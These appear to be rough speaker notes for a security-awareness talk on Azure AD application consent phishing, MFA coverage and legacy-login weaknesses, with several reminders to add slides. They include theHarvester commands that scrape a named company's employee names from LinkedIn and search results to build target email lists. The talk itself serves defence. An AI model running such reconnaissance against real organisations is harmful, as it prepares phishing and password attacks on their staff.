Applications have been able to leverage Windows Server Active Directory for user authentication for many years without requiring the application to be registered or recorded in the directory. Now admins aren’t necessarily needed, which removes workload. Permissions: some require admin. But still, simple user-consentable stuff is very powerful!
Redirect URL: where the authentication response is sent.
Needed for authentication
Platforms:
Let’s talk about permissions
Consent Link + more research on service principal and how this stuff really works
Do I want this slide?
Demo on phishing email. Plus what they could do.
- To look into: prevent users from consenting?
AAD portal: need to know (aad.portal.azure.com)
Need graphics for what happened
theHarvester -d ytria.com -b google
theHarvester -d ytria.com -b linkedin and then | cut -d"-" -f1 > employees.txt
Maybe work on the login names from -b linkedin to create a list of stuff matching the email format from -b google?
Have you set up MFA yet? I’m not going to spend a LOT of time on this but let’s be sure to cover it
- To see if I have the time for a cool pic / story on this
To add: Screenshots AND where is this stuff? (Threat management)
Only a matter of time: payroll stuff has already been flagged by google.
If I was really a malicious actor, I’d take a closer look at those sites..
Do I maybe talk about more here? Slide needs more meat
While the password wasn’t accepted, MFA wasn’t triggered. Means that the method they use to do this uses the same method to log in through AAD but does not support MFA.
https://rcpmag.com/articles/2018/06/01/microsoft-threat-tracker-office-365-security.aspx
To add screenshot and more explanation
First letter always caps, second and third always lowercase.